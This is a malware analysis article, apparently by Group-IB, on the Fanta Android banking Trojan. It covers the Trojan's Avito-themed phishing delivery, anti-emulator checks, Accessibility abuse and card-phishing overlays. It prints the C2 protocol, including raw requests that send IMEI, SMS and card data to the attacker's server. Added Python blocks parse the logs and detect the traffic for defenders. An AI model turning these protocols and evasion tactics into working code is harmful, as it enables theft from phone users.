New tactics of the old Android Trojan

Tomcat

One day you decide to sell something on Avito, post a detailed description of your product (for example, a RAM module), and receive this message.

Once you open the link, you will see a seemingly innocuous page notifying you, the happy and successful seller, that a purchase has been made.

Once you click the “Continue” button, an APK file with a trust-inspiring name and icon is downloaded to your Android device. You install an application that, for some reason, requests AccessibilityService rights; a couple of windows appear and quickly disappear, and... that's it.

You go to check your balance, but for some reason your banking app asks for your card details again. After entering the data, something terrible happens: for some reason still unclear to you, money begins to disappear from your account. You are trying to solve the problem, but your phone resists: it presses the “Back” and “Home” keys, does not turn off and does not allow you to activate any security measures. As a result, you are left without money, your goods have not been purchased, you are confused and wonder: what happened?

The answer is simple: you have become a victim of the Fanta Android Trojan, a member of the Flexnet family. How did this happen? Let's explain now.

Authors: Andrey Polovinkin, junior specialist in malware analysis, Ivan Pisarev, specialist in malware analysis.

Some statistics

The Flexnet family of Android Trojans first became known back in 2015. Over its long period of activity, the family has expanded into several subspecies: Fanta, Limebot, Lipton, etc. Neither the Trojan nor the infrastructure around it stands still: new and effective distribution schemes are being developed (in our case, high-quality phishing pages aimed at a specific seller), and the Trojan's developers follow the current trends in malware writing, adding new functionality that lets them steal money from infected devices more efficiently and bypass protection mechanisms.

The campaign described in this article is aimed at users from Russia; a small number of infected devices were recorded in Ukraine, and even fewer in Kazakhstan and Belarus.

Even though Flexnet has been in the Android Trojan arena for over 4 years now and has been studied in detail by many researchers, it is still in good shape. Starting from January 2019, the potential amount of damage is more than 35 million rubles - and this is only for campaigns in Russia. In 2015, various versions of this Android Trojan were sold on underground forums, where the source code of the Trojan with a detailed description could also be found. This means that the statistics of damage in the world are even more impressive. Not a bad indicator for such an old man, isn't it?

From sale to deception

As can be seen from the screenshot of the phishing page shown earlier, which imitates the Avito classified ads service, the page was prepared for a specific victim. Apparently, the attackers use one of the Avito parsers, which extracts the seller's phone number and name as well as the product description. After deploying the page and preparing the APK file, the victim is sent an SMS containing their name and a link to a phishing page with a description of their product and the amount received from the “sale”. By clicking the button, the user receives a malicious APK file: Fanta.

A study of the shcet491[.]ru domain showed that it is delegated to Hostinger’s DNS servers:
  • ns1.hostinger.ru
  • ns2.hostinger.ru
  • ns3.hostinger.ru
  • ns4.hostinger.ru

The domain zone file contains entries pointing to the IP addresses 31.220.23[.]236, 31.220.23[.]243, and 31.220.23[.]235. However, the domain's primary resource record (A record) points to a server with IP address 178.132.1[.]240.

The IP address 178.132.1[.]240 is located in the Netherlands and belongs to the WorldStream hoster. The IP addresses 31.220.23[.]235, 31.220.23[.]236 and 31.220.23[.]243 are located in the UK and belong to HOSTINGER shared hosting servers. Openprov-ru is the registrar. The following domains also resolved to the IP address 178.132.1[.]240.

It should be noted that links in the following format were available from almost all of these domains:
Code:
http://(www.){0,1}<%domain%>/[0-9]{7}

This template also matches the link from the SMS messages. Based on historical data, it was found that one domain corresponds to several links matching the pattern above, which indicates that one domain was used to distribute the Trojan to several victims. Let's jump ahead a little: the Trojan downloaded via the link from the SMS uses the address onuseseddohap[.]club as its control server. This domain was registered on 2019-03-12, and starting from 2019-04-29 APK applications interacted with it. According to data obtained from VirusTotal, a total of 109 applications interacted with this server. The domain itself resolved to the IP address 217.23.14[.]27, located in the Netherlands and owned by the WorldStream hoster; Namecheap is the registrar. The domains bad-racoon[.]club (from 2018-09-25) and bad-racoon[.]live (from 2018-10-25) also resolved to this IP address. More than 80 APK files interacted with the bad-racoon[.]club domain, and more than 100 with bad-racoon[.]live. In general, the attack proceeded as follows:

What's under Fanta's lid?

Like many other Android Trojans, Fanta can read and send SMS messages, make USSD requests, and display its own windows on top of other applications (including banking ones). However, the family's arsenal has grown: Fanta has started using the AccessibilityService for various purposes, such as reading the contents of other applications' notifications and preventing its own detection and termination on the infected device. Fanta works on all versions of Android from 4.4 upward. In this article we take a closer look at the following Fanta sample:
  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Immediately after launch

Immediately after launch, the Trojan hides its icon. The application can only work if the name of the infected device is not in the list:
  • android_x86
  • VirtualBox
  • Nexus 5X(bullhead)
  • Nexus 5(razor)

This check is carried out in the Trojan's main service, MainService. On first launch, the application's configuration parameters are initialized to default values (the format in which configuration data is stored, and its meaning, is discussed later) and the newly infected device is registered on the control server. An HTTP POST request with the register_bot message type is sent to the server along with information about the infected device (Android version, IMEI, phone number, operator name and the country code in which the operator is registered). The address hXXp://onuseseddohap[.]club/controller.php acts as the control server. In response, the server sends a message containing the fields bot_id, bot_pwd and server; the application saves these values as the parameters of the CnC server. The server field is optional: if it is not received, Fanta keeps using the registration address, hXXp://onuseseddohap[.]club/controller.php. The ability to change the CnC address serves two purposes: distributing load evenly between several servers (with a large number of infected devices, the load on an unoptimized web server can be high), and falling back to an alternative server if one of the CnC servers fails.

If an error occurs while sending the request, the Trojan will repeat the registration process after 20 seconds.

Once the device has been successfully registered, Fanta will display the following message to the user:

Important note: the service called System Security is the Trojan's own service. After the OK button is clicked, the Accessibility settings window of the infected device opens, where the user must grant Accessibility rights to the malicious service themselves:

As soon as the user enables the AccessibilityService, Fanta gains access to the contents of application windows and the actions performed in them:

Immediately after receiving Accessibility rights, the Trojan requests administrator rights and rights to read notifications:

Using the AccessibilityService, the application simulates keystrokes, thereby giving itself all the necessary rights.

Fanta creates multiple database instances (which will be described later) necessary to store configuration data, as well as information collected in the process about the infected device. To send the collected information, the Trojan creates a repeating task designed to download fields from the database and receive a command from the control server. The interval for accessing CnC is set depending on the Android version: in the case of 5.1, the interval will be 10 seconds, otherwise 60 seconds.

To receive a command, Fanta makes a GetTask request to the control server. In response, CnC can send one of the following commands:
Command   Description
0         Send SMS message
1         Make a phone call or USSD command
2         Update the interval parameter
3         Update the intercept parameter
6         Update the smsManager parameter
9         Start collecting SMS messages
11        Reset the phone to factory settings
12        Enable/disable logging of dialog box creation

Fanta also collects notifications from 70 banking apps, fast payment systems and e-wallets and stores them in a database.

Storing configuration parameters

To store configuration parameters, Fanta uses a standard approach for the Android platform - Preferences files. The settings will be saved to a file called settings. A description of the saved parameters is in the table below.
Name       | Default value                | Possible values | Description
id         | 0                            | Integer         | Bot ID
server     | hXXp://onuseseddohap[.]club/ | URL             | Control server address
pwd        | -                            | String          | Server password
interval   | 20                           | Integer         | Time interval: how long the following tasks are deferred: sending a request about the status of a sent SMS message; receiving a new command from the control server
intercept  | all                          | all/telNumber   | If the field equals the string all or telNumber, a received SMS message is intercepted by the application and not shown to the user
smsManager | 0                            | 0/1             | Enable/disable the application as the default SMS recipient
readDialog | false                        | true/false      | Enable/disable logging of AccessibilityEvent events

Fanta also uses the smsManager file:

Name | Default value | Possible values | Description
pckg | -             | String          | Name of the SMS message manager used

Interaction with databases

During its operation, the Trojan uses two databases. A database named a is used to store various information collected from the phone. The second database is named fanta.db and is used to save settings responsible for creating phishing windows designed to collect information about bank cards.

The Trojan uses database a to store the information it collects and to log its actions. The data is stored in the logs table, which is created with the following SQL query:

Code:
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

The database contains the following information:

1. Logging that the infected device is turned on with the message Phone turned on!

2. Notifications from applications. The message is generated according to the following template:

Code:
(<%App Name%>)<%Title%>: <%Notification text%>

3. Bank card data from phishing forms created by the Trojan. The VIEW_NAME parameter can be one of the following:
  • AliExpress
  • Grandfather
  • Google Play
  • Miscellaneous <%App Name%>

The message is logged in the format:

Code:
[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Incoming/outgoing SMS messages in the format:

Code:
([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Information about the package that creates the dialog box in the format:

Code:
(<%Package name%>)<%Package information%>
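As an added forensic example (not code from the original analysis), the following Python builds the logs table with the CREATE statement above, inserts constructed rows in each of the five documented formats, and classifies them so an analyst can inventory what an infected device had queued for upload. It assumes column f is unused, masks card numbers and drops the CVV from its output; the row contents are constructed placeholders.

```python
import re
import sqlite3

# Schema of the logs table exactly as given in the analysis above.
CREATE_LOGS = ("create table logs ( _id integer primary key autoincrement, "
               "d TEXT, f TEXT, p TEXT, m integer)")

TIME = r"\[(?P<time>\d{2}:\d{2}:\d{2} \d{2}\.\d{2}\.\d{4})\]"

# One regex per documented record format; order matters because the
# notification and dialog formats overlap (a dotted package name decides).
PATTERNS = [
    ("power_on", re.compile(r"^Phone turned on!$")),
    ("card", re.compile(r"^" + TIME + r"\((?P<view>[^)]+)\) Номер карты:(?P<card>[^;]*); "
                        r"Дата:(?P<month>\d+)/(?P<year>\d+); CVV: (?P<cvv>\d*)$")),
    ("sms", re.compile(r"^\(" + TIME + r" Тип: (?P<direction>Входящее|Исходящее)\) "
                       r"(?P<sender>[^:]+):(?P<text>.*)$", re.S)),
    ("dialog", re.compile(r"^\((?P<pkg>[a-z]\w*(?:\.\w+)+)\)(?P<info>.*)$", re.S)),
    ("notification", re.compile(r"^\((?P<app>[^)]+)\)(?P<title>[^:]*): (?P<text>.*)$", re.S)),
]

def classify(text: str) -> dict:
    """Recognise which of the five logs formats a record uses and extract its fields."""
    for kind, rx in PATTERNS:
        m = rx.match(text)
        if not m:
            continue
        rec = {"kind": kind, **m.groupdict()}
        if kind == "card":
            # Keep only the last four digits and drop the CVV: triage output
            # must not become a second copy of the stolen card data.
            digits = re.sub(r"\D", "", rec["card"])
            rec["card"] = "*" * max(len(digits) - 4, 0) + digits[-4:]
            del rec["cvv"]
        return rec
    return {"kind": "unknown", "text": text}

def triage(conn: sqlite3.Connection) -> list:
    """Read every logs row and attach the classification to its columns.

    Column d is the record text and p/m are what the Trojan uploads as
    number/sms_mode; column f is not documented (assumption: unused).
    """
    rows = conn.execute("select _id, d, p, m from logs order by _id").fetchall()
    return [{"id": i, "number": p, "sms_mode": m, **classify(d)} for i, d, p, m in rows]

def build_sample_db() -> sqlite3.Connection:
    """In-memory stand-in for database a, filled with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(CREATE_LOGS)
    samples = [
        ("Phone turned on!", "", 0),
        ("(Bank App)Login code: 123456", "", 0),
        ("[12:00:05 01.05.2019](AliExpress) Номер карты:4000000000000002; "
         "Дата:12/2022; CVV: 000", "", 0),
        ("([12:01:00 01.05.2019] Тип: Входящее) +70000000000:Your code is 4321",
         "+70000000000", 1),
        ("(com.android.settings)Settings", "", 0),
    ]
    conn.executemany("insert into logs (d, f, p, m) values (?, '', ?, ?)", samples)
    return conn

if __name__ == "__main__":
    for rec in triage(build_sample_db()):
        print(rec)
```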

One of Fanta's functions is collecting bank card data. Collection takes place through phishing windows shown when banking applications are opened. The Trojan shows the phishing window only once; the fact that a window has been shown to the user is stored in the settings table of the fanta.db database, which is created with the following SQL query:

Code:
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

All fields in the settings table are initialized to 1 by default (show the phishing window). After the user enters their data, the value is set to 0. Meaning of the settings table fields:
  • can_login — the field is responsible for displaying the form when opening a banking application
  • first_bank - not used
  • can_avito - the field is responsible for displaying the form when opening the Avito application
  • can_ali - the field is responsible for displaying the form when opening the Aliexpress application
  • can_another - the field is responsible for displaying the form when opening any application from the list: Yula, Pandao, Drom Auto, Wallet. Discount and bonus cards, Aviasales, Booking, Trivago
  • can_card - the field is responsible for displaying the form when opening Google Play

Interaction with the management server

Network interaction with the control server takes place over HTTP. For networking, Fanta uses the popular Retrofit library. Requests are sent to hXXp://onuseseddohap[.]club/controller.php. The server address can be changed during registration on the server. The server may send cookies in its response. Fanta makes the following requests to the server:
  • Registration of the bot on the control server occurs once, upon first launch. The following data about the infected device is sent to the server:
    · Cookie — cookies received from the server (default value is an empty string)
    · mode — string constant register_bot
    · prefix — integer constant 2
    · version_sdk — generated according to the following template: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
    · imei — IMEI of the infected device
    · country — code of the country in which the operator is registered, in ISO format
    · number — phone number
    · operator — name of the operator

    Example of a request sent to the server:
    Code:
    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 144
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>

    In response to the request, the server must return a JSON object containing the following parameters:
    · bot_id — identifier of the infected device. If bot_id is equal to 0, Fanta will re-execute the request.
    · bot_pwd — password for the server.
    · server — address of the management server. Optional parameter. If the parameter is not specified, the address saved in the application will be used.

    Example JSON object:
    Code:
    {
        "response": [
            {
                "bot_id": <%BOT_ID%>,
                "bot_pwd": <%BOT_PWD%>,
                "server": <%SERVER%>
            }
        ],
        "status": "ok"
    }

  • Request to receive a command from the server. The following data is sent to the server:
    · Cookie — cookies received from the server
    · bid — id of the infected device, which was received when sending a register_bot request
    · pwd — password for the server
    · divice_admin — the field determines whether administrator rights have been obtained. If administrator rights have been obtained, the field is equal to 1, otherwise 0
    · Accessibility — operation status of the Accessibility Service. If the service was started, the value is 1, otherwise 0
    · SMSManager — shows whether the Trojan is enabled as the default application for receiving SMS
    · screen — shows what state the screen is in. Set to 1 if the screen is on, otherwise 0

    An example of a request sent to the server:
    Code:
    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

    Depending on the command, the server can return a JSON object with different parameters:

    · Send SMS message command: the parameters contain the phone number, the text of the SMS message and the ID of the message being sent. The identifier is used when sending a message of the setSmsStatus type to the server.
    Code:
    {
        "response": [
            {
                "mode": 0,
                "sms_number": <%SMS_NUMBER%>,
                "sms_text": <%SMS_TEXT%>,
                "sms_id": <%SMS_ID%>
            }
        ],
        "status": "ok"
    }

    · Make a phone call or USSD command: the phone number or command comes in the response body.
    Code:
    {
        "response": [
            {
                "mode": 1,
                "command": <%TEL_NUMBER%>
            }
        ],
        "status": "ok"
    }

    · Change interval parameter command.
    Code:
    {
        "response": [
            {
                "mode": 2,
                "interval": <%SECONDS%>
            }
        ],
        "status": "ok"
    }

    · Change intercept parameter command.
    Code:
    {
        "response": [
            {
                "mode": 3,
                "intercept": "all"/"telNumber"/<%ANY_STRING%>
            }
        ],
        "status": "ok"
    }

    · Change SmsManager field command.
    Code:
    {
        "response": [
            {
                "mode": 6,
                "enable": 0/1
            }
        ],
        "status": "ok"
    }

    · Collect SMS messages from the infected device command.
    Code:
    {
        "response": [
            {
                "mode": 9
            }
        ],
        "status": "ok"
    }

    · Reset phone to factory settings command.
    Code:
    {
        "response": [
            {
                "mode": 11
            }
        ],
        "status": "ok"
    }

    · Change ReadDialog parameter command.
    Code:
    {
        "response": [
            {
                "mode": 12,
                "enable": 0/1
            }
        ],
        "status": "ok"
    }

  • Sending a message with type setSmsStatus. This request is carried out after executing the Send SMS message command. The request looks like this:
    Code:
    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

  • Uploading database contents. One row is transmitted per request. The following data is sent to the server:
    · Cookie — cookies received from the server
    · mode — string constant setSaveInboxSms
    · bid — id of the infected device that was received when sending the register_bot request
    · text — text of the current database record (field d from the logs table in database a)
    · number — name of the current database record (field p from the logs table in database a)
    · sms_mode — integer value (field m from the logs table in database a)

    The request looks like this:
    Code:
    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

    If successfully sent to the server, the row will be deleted from the table. Example of a JSON object returned by the server:
    Code:
    {
        "response": [],
        "status": "ok"
    }
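As an added illustration of the C2 exchange documented in this section (example code, not Group-IB's or the Trojan's), the following Python parses a captured request in the form shown above, flags the markers a defender can key on (the mode values, the controller.php path, the okhttp user agent and the misspelt divice_admin field), and decodes a getTask reply into the command names from the table. The sample request and reply are constructed, with placeholder bid/pwd values, and the indicator names are this example's own.

```python
import json
from typing import Optional
from urllib.parse import parse_qs

# Command numbers returned in the "mode" field of a getTask reply,
# taken from the command table in the analysis above.
FANTA_COMMANDS = {
    0: "send SMS message",
    1: "phone call or USSD command",
    2: "update interval parameter",
    3: "update intercept parameter",
    6: "update smsManager parameter",
    9: "collect SMS messages",
    11: "factory reset",
    12: "toggle dialog-box logging",
}

# Values of the "mode" form field observed in Fanta POST bodies.
FANTA_MODES = {"register_bot", "getTask", "setSmsStatus", "setSaveInboxSms"}

def parse_http_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, path, headers and form fields."""
    head, _, body = raw.partition("\n\n")
    lines = head.splitlines()
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")   # handles the empty "Cookie:" header
        headers[name.strip().lower()] = value.strip()
    form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    return {"method": method, "path": path, "headers": headers, "form": form}

def classify_request(raw: str) -> Optional[dict]:
    """Return a verdict for a request that looks like Fanta C2 traffic, else None."""
    req = parse_http_request(raw)
    mode = req["form"].get("mode")
    if req["method"] != "POST" or mode not in FANTA_MODES:
        return None
    reasons = ["mode=" + mode]
    if req["path"].endswith("/controller.php"):
        reasons.append("controller.php endpoint")
    if req["headers"].get("user-agent", "").startswith("okhttp/"):
        reasons.append("okhttp user-agent")
    if "divice_admin" in req["form"]:   # misspelt field is implementation-specific
        reasons.append("divice_admin field")
    return {"host": req["headers"].get("host"), "mode": mode, "reasons": reasons}

def decode_task_reply(raw_json: str) -> list:
    """Translate each entry of a getTask reply into a named command plus parameters."""
    doc = json.loads(raw_json)
    tasks = []
    for entry in doc.get("response", []):
        mode = entry.get("mode")
        params = {k: v for k, v in entry.items() if k != "mode"}
        tasks.append({"mode": mode,
                      "command": FANTA_COMMANDS.get(mode, "unknown"),
                      "params": params})
    return tasks

# Constructed sample traffic (not a real capture); bid/pwd values are placeholders.
SAMPLE_GETTASK = (
    "POST /controller.php HTTP/1.1\n"
    "Cookie:\n"
    "Host: onuseseddohap.club\n"
    "User-Agent: okhttp/3.6.0\n"
    "\n"
    "mode=getTask&bid=1234&pwd=PLACEHOLDER&divice_admin=1&Accessibility=1&SMSManager=0&screen=1"
)
SAMPLE_REPLY = ('{"response":[{"mode":0,"sms_number":"+70000000000",'
                '"sms_text":"test","sms_id":7}],"status":"ok"}')
```

Feeding real proxy or sandbox captures through classify_request is enough to surface the register_bot and getTask beacons on a suspected device's traffic.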

Interaction with AccessibilityService

AccessibilityService was designed to make Android devices easier to use for people with disabilities. Normally, physical interaction with the screen is required to operate an application; AccessibilityService allows those interactions to be performed programmatically. Fanta uses the service to create fake windows on top of banking applications and to prevent users from opening system settings and some applications.

Using the functionality of the AccessibilityService, the Trojan monitors changes to elements on the screen of the infected device. As previously described, the Fanta settings contain a parameter responsible for logging operations with dialog boxes - readDialog. If this parameter is set, information about the name and description of the package that triggered the event will be added to the database. The Trojan performs the following actions when events are triggered:
  • Simulates pressing the back and home keys in the following cases:
    · if the user wants to restart his device
    · if the user wants to delete the “Avito” application or change access rights
    · if there is a mention of the “Avito” application on the page
    · when opening the “Google Play Protection” application
    · when opening pages with AccessibilityService settings
    · when the “System Security” dialog box appears
    · when opening a page with “Draw over other app” settings
    · when opening the page “Applications”, “Backup and reset”, “Reset data”, “Reset settings” , “Developer Panel”, “Special. capabilities”, “Special capabilities”, “Special rights”
    · if the event was generated by certain applications.

  • If permission is requested when sending an SMS message to a short number, Fanta simulates clicking the Remember selection checkbox and the send button.
  • When you try to take away administrator rights from the Trojan, it locks the phone screen.
  • Prevents adding new administrators.
  • If the dr.web antivirus application detects a threat, Fanta simulates clicking the ignore button.
  • The Trojan simulates pressing the back and home button if the event was generated by the Samsung Device Care application.
  • Fanta creates phishing windows with forms for entering information about bank cards if an application from a list of about 30 different Internet services was launched. Among them: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto, etc.

Phishing forms

Fanta analyzes which applications are running on the infected device. If an application of interest is opened, the Trojan displays a phishing window on top of all others: a form for entering bank card information. The user is asked to enter the following data:
  • Card number
  • Card expiry date
  • CVV
  • Cardholder name (not for all banks)

Depending on the running application, different phishing windows are shown. Below are examples of some of them:

How it really was

Fortunately, the person who received the SMS message described at the beginning of the article turned out to be a cybersecurity specialist. Therefore, the real version differs from the dramatized one told earlier: a person received an interesting SMS and handed it over to the Group-IB Threat Hunting Intelligence team. The result of the attack is this article. Happy ending, right? However, not all stories end so well, and so that yours does not turn into the dramatized version with a loss of money, in most cases it is enough to follow these well-known rules:
  • do not install applications on an Android device from any source other than Google Play
  • when installing an application, pay special attention to the rights it requests
  • pay attention to the extensions of downloaded files
  • install Android OS updates regularly
  • do not visit suspicious resources and do not download files from them
  • do not click on links received in SMS messages

Group-IB knows everything about cybercrime, but tells you only the most interesting things.

An action-packed Telegram channel (https://t.me/Group_IB) about information security, hackers and cyber attacks, hacktivists and Internet pirates. Step-by-step investigations into high-profile cybercrimes, practical cases using Group-IB technologies and, of course, recommendations on how to avoid becoming a victim on the Internet.

YouTube channel here
Group-IB photo feed on Instagram www.instagram.com/group_ib
Short news on Twitter twitter.com/GroupIB

Group-IB is one of the leading developers of solutions for detecting and preventing cyber attacks, detecting fraud and protecting intellectual property on the network, with headquarters in Singapore.
 